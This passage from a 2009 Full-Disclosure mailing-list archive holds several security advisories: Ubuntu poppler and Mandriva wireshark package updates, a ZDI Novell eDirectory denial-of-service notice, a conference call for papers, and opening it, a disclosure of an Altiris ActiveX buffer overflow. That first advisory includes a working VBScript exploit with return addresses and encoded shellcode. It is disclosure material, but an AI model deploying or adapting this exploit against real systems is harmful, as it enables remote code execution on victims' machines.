  Discovered by:          Nikolas Sotiriu
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: For the permission to use his
                                          Policy



Background:
===========

Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.

(Product description from Symantec Website)



Description:
============

During the first access of the Management Website an ActiveX Control
will be installed (AeXNSConsoleUtilities.dll), in which the function
"BrowseAndSaveFile" is vulnerable to a stack based buffer overflow.

Name:             ConsoleUtilities Class
Vendor:           Altiris, Inc.
Type:             ActiveX-Steuerelement
Version:          6.0.0.1846
GUID:             {B44D252D-98FC-4D5C-948C-BE868392A004}
File:             AeXNSConsoleUtilities.dll
Folder:           C:\WINDOWS\system32



Proof of Concept :
==================

<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>

Sub Submit_OnClick

   For i=0 to 2
      If document.ret.os(i).checked Then
         target=document.ret.os(i).value
      End If
   Next

   EIP=unescape(target)
   arg1 = ""
   arg3 = ""
   arg4 = ""
   arg5 = ""

   junk=String(310, "A") 'junk

   morejunk=String(18, unescape("%u0041")) 'more junk

   // windows/exec - 224 bytes
   // http://www.metasploit.com
   // Encoder: x86/call4_dword_xor
   // EXITFUNC=seh, CMD=calc.exe
   code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
                 "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
                 "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
                 "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
                 "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
                 "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
                 "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
                 "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
                 "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
                 "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
                 "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
                 "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
                 "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
                 "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")

   buf=junk+EIP+morejunk+break+code

   obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>

<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>

<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>

XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
	
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
 <input type=radio name="os" value="%u4141%u4141">
    DoS<br>
 <input type=radio name="os" value="%uaf0a%u77d5">
    Windows XP SP2 German<br>
 <input type=radio name="os" value="%u30D7%u7E68">
    Windows XP SP3 German<br>
 <input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>



Solution:
=========

Symantec Security Advisory:
http://tinyurl.com/y9fakve

Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568

Hotfix (KB49389): Notification Server 6.x
                  Symantec Management Platform 7.x
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.09: Vulnerability found
2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2009.10.01) to Vendor
2009.09.15: Vendor response asking for resending the poc in a zipped and
            password protected file (AV problem)
2009.09.15: Resending zipped and password protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Ask for a status update, because the planned release date is
            2009.10.01.
2009.09.29: Symantec Security Response Team tries to get a time line
            from the product team.
2009.09.30: Changed release date to 2009.10.08 until a time line is
            known
2009.10.07: Ask for a status update, because the planned release date is
            2009.10.08.
2009.10.07: Symantec Security Response Team informs me if all goes well
            they need one more week.
2009.10.07: Changed release date to 2009.10.15.
2009.10.14: Ask for a status update, because the planned release date is
            2009.10.15.
2009.10.14: Symantec Security Response Team informs me that they have
            an issue with an update and they need one more week.
2009.10.14: Changed release date to 2009.10.22.
2009.10.21: Ask for a status update, because the planned release date is
            2009.10.22.
2009.10.21: Symantec Security Response Team informs me that they have
            an issue with an update.
2009.10.21: Changed release date to 2009.10.29.
2009.10.28: Ask for a status update, because the planned release date is
            2009.10.29.
2009.10.29: Symantec Security Response Team informs me that the patch
            will be released on 2009.11.02 at 9am PST.
2009.11.02: Symantec Security Response Team informs me that the patch
            and the Advisory is released.
2009.11.02: Release of this Advisory




From marc.deslauriers at canonical.com  Mon Nov  2 21:46:33 2009
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Mon, 02 Nov 2009 16:46:33 -0500
Subject: [Full-disclosure] [USN-850-3] poppler vulnerabilities
Message-ID: <1257198393.8372.1.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-850-3          November 02, 2009
poppler vulnerabilities
CVE-2009-3603, CVE-2009-3604, CVE-2009-3607, CVE-2009-3608,
CVE-2009-3609
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  libpoppler-glib4                0.12.0-0ubuntu2.1
  libpoppler5                     0.12.0-0ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-850-1 fixed vulnerabilities in poppler. This update provides the
corresponding updates for Ubuntu 9.10.

Original advisory details:

 It was discovered that poppler contained multiple security issues when
 parsing malformed PDF documents. If a user or automated system were tricked
 into opening a crafted PDF file, an attacker could cause a denial of
 service or execute arbitrary code with privileges of the user invoking the
 program.


Updated packages for Ubuntu 9.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.12.0-0ubuntu2.1.diff.gz
      Size/MD5:    15454 48a80d636158aa98b507c85607c379c7
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.12.0-0ubuntu2.1.dsc
      Size/MD5:     1692 0e33aecf9e3c097fa1a5445bf4396f91
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.12.0.orig.tar.gz
      Size/MD5:  1595424 399b25d9d71ad22bc9a2a9281769c49c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:  1051952 700c63d275b983dba55c6abfd9c3ec21
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:   147622 8f53a579169d196b59c865e6b34579a4
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib4_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:    75084 8d5d57f163087638bd61353fba3c82b6
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:    55886 4fb8c88e15cae8a3f2bc03a7dd564612
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:    26020 0b157d328ea46a5cd2a5a637563c01f8
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-3_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:   169760 e6a9de15ef88077713abb5486a419a06
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:   245990 72cba1a5cdf707e7cd95c8650c976ee7
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler5_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:   757804 6e2520a2a9ba32a4f3e28e39c34fead0
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-dbg_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:  3352280 2674ea34101cd26e76d359e4fa1ae1d0
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.12.0-0ubuntu2.1_amd64.deb
      Size/MD5:    84172 d2685cf3c57bd1102c210c18f55686b5

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:   989336 23134e2af4161b817e87d114f36bbb11
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:   140976 67cb2da532b6af1009b71825227266ec
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib4_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:    72378 2f7c93e9da887f145de10329aba0ef98
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:    53594 71e81f0cab72a786d4be9da566f57bf5
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:    25628 8068a8f5872026777b6e3c659b0f7f94
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-3_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:   166224 f632da6ffcf74bd16ea244aa62d32cf8
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:   231216 73f64210ed94368602bce01cb8623e9e
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler5_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:   725724 47faef2db50f38de117fe8270b75d2b4
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-dbg_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:  3274002 0faa823f34836a3046221ea840291ac3
    http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.12.0-0ubuntu2.1_i386.deb
      Size/MD5:    80140 56f7601d98080759427904a5cda8fc1c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:  1004264 ab6c2ce6fca7bc156bb79ee9098db4a6
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:   142336 40691b4d045114f85022295f16bb715a
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib4_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:    72620 949aefc47f714cd6bf04b572cd64a422
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:    53838 b28eb49e9f317a3ff62dad035e3c18d2
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:    25578 6859e69db4d7b0e849c6ba0b07ceca22
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-3_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:   167256 77527ca39229b2908deac999e98feb93
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:   236556 5b472282eb85b9fd5f3f5adfe5bd579c
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler5_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:   736340 6e298d3ae22ca1e235efca71adef1e77
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-dbg_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:  3299736 e4317c538e932ef9f349ada04c49772e
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.12.0-0ubuntu2.1_lpia.deb
      Size/MD5:    81398 c3c07e4d1ca4afd89026c2e94b32d489

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:  1132462 fe92b06a1afaee95aab8e9fee5172ebd
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:   154828 e8656dcfca021f74ef74d3305a3777dd
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib4_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:    79136 43bec50dd396f4e408e439dcff4050ee
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:    56918 11e2b15a48bcd8f6dd4edf1b2a3f94f6
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:    26764 3a9015b5ef5e4456d99aed94d9795b13
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-3_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:   170914 364e184c49ad48bcbcb607a754820856
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:   251780 c68cee53af60cfc18123960426f71ebd
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler5_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:   796134 56d908a8957794858adf9fac1f05e69d
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-dbg_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:  3472754 e4df589ab148c9b4e10252edbccf6d63
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.12.0-0ubuntu2.1_powerpc.deb
      Size/MD5:    84200 11bd5fff3480bebdf34a3f448a4e19b9

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:  1024090 f0aa671a65979f05b98a68c06702577a
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:   145424 0fa9ac58cbd89b973d473ea8b8097168
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib4_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:    73066 44ea8c81756572a26c7cf91a2a28a22e
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:    53156 2d6b94d35ccd3edf77730f19ad142965
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:    24208 6a4d8c3dd160266b3626aace0eb9cb2b
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-3_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:   168684 414dea9f6db5bbe8cc1e32d7ea7b1a66
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:   244118 39b3946c546ac384cdc9552257253981
    http://ports.ubuntu.com/pool/main/p/poppler/libpoppler5_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:   749070 5f96f15d3527c3d4311d4ca3746fc5cc
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-dbg_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:  3243548 25690cbe96ebf2d5da437fe176fe412c
    http://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.12.0-0ubuntu2.1_sparc.deb
      Size/MD5:    80606 e56113c88e7b1144f7979e869a6f0c2f



-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091102/c393b0dc/attachment.bin 

From security at mandriva.com  Tue Nov  3 16:16:01 2009
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 03 Nov 2009 17:16:01 +0100
Subject: [Full-disclosure] [ MDVSA-2009:292 ] wireshark
Message-ID: <E1N5M38-0002Fl-5d@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:292
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : November 3, 2009
 Affected: 2009.1, Corporate 4.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Vulnerabilities have been discovered and corrected in wireshark,
 affecting DCERPC/NT dissector, which allows remote attackers to cause
 a denial of service (NULL pointer dereference and application crash)
 via a file that records a malformed packet trace (CVE-2009-3550); and
 in wiretap/erf.c which allows remote attackers to execute arbitrary
 code or cause a denial of service (application crash) via a crafted
 erf file (CVE-2009-3829).
 
 The wireshark package has been updated to fix these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3550
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3829
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.1:
 9776a5ff48251ff4014a284803f8eedb  2009.1/i586/dumpcap-1.0.10-0.1mdv2009.1.i586.rpm
 5763243f9b6de3e0eb998683eb157e37  2009.1/i586/libwireshark0-1.0.10-0.1mdv2009.1.i586.rpm
 615c1f912fcae0f63c14046c7292305e  2009.1/i586/libwireshark-devel-1.0.10-0.1mdv2009.1.i586.rpm
 fc8c67f248b0039c0006220456f7d0dc  2009.1/i586/rawshark-1.0.10-0.1mdv2009.1.i586.rpm
 be03c1c1e06412b5603dc65f1632b18a  2009.1/i586/tshark-1.0.10-0.1mdv2009.1.i586.rpm
 4da9966e690a238eecbe215bfce9fe8a  2009.1/i586/wireshark-1.0.10-0.1mdv2009.1.i586.rpm
 5ce93f8c9af2127d3255a87c0ea8503b  2009.1/i586/wireshark-tools-1.0.10-0.1mdv2009.1.i586.rpm 
 d705f70a10051311f0ccfc14e5a587af  2009.1/SRPMS/wireshark-1.0.10-0.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 ab53926e26b33237cd48aedacd0f6260  2009.1/x86_64/dumpcap-1.0.10-0.1mdv2009.1.x86_64.rpm
 4d167d0401af7c55904fd0e4bf4d5a09  2009.1/x86_64/lib64wireshark0-1.0.10-0.1mdv2009.1.x86_64.rpm
 38c8c81a64a488965f397ac55aca4f0d  2009.1/x86_64/lib64wireshark-devel-1.0.10-0.1mdv2009.1.x86_64.rpm
 0dd651556a433aae58a1d3311dbeacf4  2009.1/x86_64/rawshark-1.0.10-0.1mdv2009.1.x86_64.rpm
 4e3b3d843fc38637fb5fcb505516a444  2009.1/x86_64/tshark-1.0.10-0.1mdv2009.1.x86_64.rpm
 f5d7864ae57e97d98abfd1d0da2c601b  2009.1/x86_64/wireshark-1.0.10-0.1mdv2009.1.x86_64.rpm
 e241a5747541de4b35cb884a3a2a2e09  2009.1/x86_64/wireshark-tools-1.0.10-0.1mdv2009.1.x86_64.rpm 
 d705f70a10051311f0ccfc14e5a587af  2009.1/SRPMS/wireshark-1.0.10-0.1mdv2009.1.src.rpm

 Corporate 4.0:
 00f7f312ecb50337a61e8aa226351f0f  corporate/4.0/i586/dumpcap-1.0.10-0.1.20060mlcs4.i586.rpm
 397831075a172aa09914b851978764c0  corporate/4.0/i586/libwireshark0-1.0.10-0.1.20060mlcs4.i586.rpm
 38c43d3e4c53be9afdf63e25f81022cd  corporate/4.0/i586/libwireshark-devel-1.0.10-0.1.20060mlcs4.i586.rpm
 7fb8b1da94b58a405fc248c91a46710a  corporate/4.0/i586/rawshark-1.0.10-0.1.20060mlcs4.i586.rpm
 275f67bd5a9c81d2fa681802b17ff148  corporate/4.0/i586/tshark-1.0.10-0.1.20060mlcs4.i586.rpm
 6512854ec097ba7abd54f8fa216f6e47  corporate/4.0/i586/wireshark-1.0.10-0.1.20060mlcs4.i586.rpm
 0de613b7620d731af50e2f952311e0d4  corporate/4.0/i586/wireshark-tools-1.0.10-0.1.20060mlcs4.i586.rpm 
 29284ce6df7107031ab98a27eca0a1c5  corporate/4.0/SRPMS/wireshark-1.0.10-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 22ef3658492b8bf0222b00a213b33ddb  corporate/4.0/x86_64/dumpcap-1.0.10-0.1.20060mlcs4.x86_64.rpm
 c907ebb1ffd142898a65e4df8c4b98ae  corporate/4.0/x86_64/lib64wireshark0-1.0.10-0.1.20060mlcs4.x86_64.rpm
 a61af49a91c9313aa48911240f11b878  corporate/4.0/x86_64/lib64wireshark-devel-1.0.10-0.1.20060mlcs4.x86_64.rpm
 c7c476849dd061df9caa056ee435486c  corporate/4.0/x86_64/rawshark-1.0.10-0.1.20060mlcs4.x86_64.rpm
 06ea86736d32c321e0f6db14c71eec31  corporate/4.0/x86_64/tshark-1.0.10-0.1.20060mlcs4.x86_64.rpm
 1a866f965de14960eec591b4ef91fdb3  corporate/4.0/x86_64/wireshark-1.0.10-0.1.20060mlcs4.x86_64.rpm
 619b8cd611129692d4b6948121311336  corporate/4.0/x86_64/wireshark-tools-1.0.10-0.1.20060mlcs4.x86_64.rpm 
 29284ce6df7107031ab98a27eca0a1c5  corporate/4.0/SRPMS/wireshark-1.0.10-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 acb7f0ef708faabc4f8a0107413581ba  mes5/i586/dumpcap-1.0.10-0.1mdvmes5.i586.rpm
 89771916a201d1877a4e6b3979c9382a  mes5/i586/libwireshark0-1.0.10-0.1mdvmes5.i586.rpm
 441055d1c582709fe952c66b0cf0bb3e  mes5/i586/libwireshark-devel-1.0.10-0.1mdvmes5.i586.rpm
 8fcc2774a57fe38b3d93ca2be71d485a  mes5/i586/rawshark-1.0.10-0.1mdvmes5.i586.rpm
 c2c3e70bffbb284c180d38e59ed78647  mes5/i586/tshark-1.0.10-0.1mdvmes5.i586.rpm
 a27530dc435f220afad5a0fa66477210  mes5/i586/wireshark-1.0.10-0.1mdvmes5.i586.rpm
 3f9f26f368c18086672e723566960fd1  mes5/i586/wireshark-tools-1.0.10-0.1mdvmes5.i586.rpm 
 8161692312392406d4105dc57fc5e2b6  mes5/SRPMS/wireshark-1.0.10-0.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 98dfad4d56c40915a2d2b5dd35f21962  mes5/x86_64/dumpcap-1.0.10-0.1mdvmes5.x86_64.rpm
 337bda567ca9396d3efdcf80d2b816fb  mes5/x86_64/lib64wireshark0-1.0.10-0.1mdvmes5.x86_64.rpm
 f46f021b8985694bef66063606f7b6f1  mes5/x86_64/lib64wireshark-devel-1.0.10-0.1mdvmes5.x86_64.rpm
 4858f505a59f1fc0f6cf328dc7079c37  mes5/x86_64/rawshark-1.0.10-0.1mdvmes5.x86_64.rpm
 b78c0346f33b1a5d365be74b7b7613c6  mes5/x86_64/tshark-1.0.10-0.1mdvmes5.x86_64.rpm
 7e0257e5e30b86c2adc8963d750971d6  mes5/x86_64/wireshark-1.0.10-0.1mdvmes5.x86_64.rpm
 ee4107ff89ccf88aed9228869bfc2080  mes5/x86_64/wireshark-tools-1.0.10-0.1mdvmes5.x86_64.rpm 
 8161692312392406d4105dc57fc5e2b6  mes5/SRPMS/wireshark-1.0.10-0.1mdvmes5.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFK8CuPmqjQ0CJFipgRAnN+AKDESHVSyHgy7SSTB2ZVKHujv2P9UwCg4kds
eiZOd30/d1ivSc14kx6fQmE=
=2LhR
-----END PGP SIGNATURE-----


From zdi-disclosures at tippingpoint.com  Mon Nov  2 23:32:00 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Mon, 2 Nov 2009 17:32:00 -0600
Subject: [Full-disclosure] ZDI-09-075: Novell eDirectory LDAP Null Base DN
 Denial of Service Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D00@emb01.unity.local>

ZDI-09-075: Novell eDirectory LDAP Null Base DN Denial of Service Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-075
November 2, 2009

-- Affected Vendors:
Novell

-- Affected Products:
Novell eDirectory

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9234. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to deny services on vulnerable
installations of Novell eDirectory. Authentication is not required in
order to exploit this vulnerability.

The specific flaw exists within Novell's eDirectory Server's LDAP
implementation. Novell eDirectory's NDSD process binds to port 389/TCP
for handling LDAP requests. When the service processes a search request
with an undefined BaseDN, it will become unresponsive resulting in an
inability to query or authenticate to that server.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:

http://www.novell.com/support/viewContent.do?externalId=7004721

-- Disclosure Timeline:
2009-07-14 - Vulnerability reported to vendor
2009-11-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From info at quahogcon.org  Mon Nov  2 23:24:14 2009
From: info at quahogcon.org (QuahogCon)
Date: Mon, 02 Nov 2009 18:24:14 -0500
Subject: [Full-disclosure] QuahogCon Call for Papers
Message-ID: <4AEF6A1E.5030900@quahogcon.org>


About QuahogCon

QuahogCon is a new regional conference for the hacker culture in all 
forms. Hardware, Software, Security, Social, Eco Hacking, Zero Impact 
Living. Like most hacker cons, it will run Friday to Sunday. We'll have 
two tracks: one for InfoSec topics and the other track will be a mix of 
all the other topics with a bit of an emphasis on hardware hacking and 
DIY electronics. Besides our perennial InfoSec favorites, we want to 
hear from some new voices on a wider range of topics. If it's a good 
hack, we want to hear what you're doing.

QuahogCon will be held April 23rd-25th, 2010 at Hotel Providence in 
Providence, RI

Call for Papers Opens today!

Come one, come all! Screw up your courage and get up to talk in front of 
a room full of folks at QuahogCon! We're a new conference in Providence, 
RI, looking to give you a place in the Northeast to present your ideas 
on Information Security and Maker Culture. We're here to encourage the 
hacker ethic in all its forms.

Conference Format

QuahogCon has two tracks:

* Information Security
* Maker Culture

Some topics may fit into both tracks, such as a hardware hack that 
exposes a security vulnerability. Choose one or both tracks when 
submitting your proposal and we'll figure it out when we make the schedule.

Information Security Track

We're looking for interesting presentations on new, original security 
research. It would be best to debut a whole new talk, but updates to 
existing recent work are perfectly acceptable, too. We're looking to 
hear from both new voices and the usual suspects. A minor amount of 
preference will be given to folks from the Northeast who have never 
presented at a con before, for whatever reason.

Maker Culture

Here's where things will get really crazy. This is a pretty inclusive 
track, so just about anything goes. Made a difference engine out of 
Reese's Peanut Butter Cups and Pixie Stix? We want to hear about it. 
Living in a commune with some friends, composting humanure and using it 
to grow the most incredible vegetables ever? We want to hear about it. 
Got a microcontroller project monitoring your personal methane 
production? We want to hear about it. We're expecting a lot of new 
voices in this track. Make yours one of them.

Talk Length

Some folks have a lot to say, others not so much. While we'll probably 
be tweaking the schedule right up to the wire, we'd like to give folks 
the option to do either 30 or 60 minute talks. If you can expand or 
